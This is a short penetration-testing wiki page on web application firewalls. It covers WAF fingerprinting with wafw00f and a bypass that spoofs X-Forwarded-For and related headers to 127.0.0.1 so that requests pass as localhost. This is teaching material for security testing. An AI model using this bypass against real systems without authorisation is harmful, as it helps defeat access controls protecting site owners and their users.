WAFs
A Web Application Firewall (WAF) is an application-layer security control that inspects HTTP traffic to detect and block malicious requests targeting web applications. It is designed to prevent attacks like SQLi, XSS, and RCE by analyzing request patterns, payload structures, and known signatures. WAFs are commonly deployed as reverse proxies or inline filters in front of web servers and can interfere with exploitation by sanitizing input, normalizing requests, or blocking based on rule sets.
Detection
wafw00f detects and fingerprints WAF products:
wafW00f <target-IP>Bypasses
Headers
WAFs and reverse proxies often rely on IP-based logic to enforce access control, rate-limiting, or geofencing. When requests pass through intermediary services like load balancers or CDNs, the original client IP may be lost or replaced by the proxy’s address. To preserve this information, headers, such as X-Forwarded-For, are commonly used to pass the client’s IP address downstream to the application or security layer.
# Common headers
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1Some WAFs, especially misconfigured or poorly validated ones, trust these headers without verifying their source. By setting these headers to 127.0.0.1, the attacker can trick the WAF or the backend application into thinking the request is coming from localhost. This may bypass access controls that restrict functionality to internal addresses, disable WAF inspection for trusted IPs, or grant administrative privileges reserved for local traffic. In some cases, WAF rules may explicitly whitelist 127.0.0.1 or ignore inspection for requests appearing to originate from the loopback interface.
This can be automated with Burp's Bypass WAF extension which automatically adds all the above headers in its defined scope.
Last updated
Was this helpful?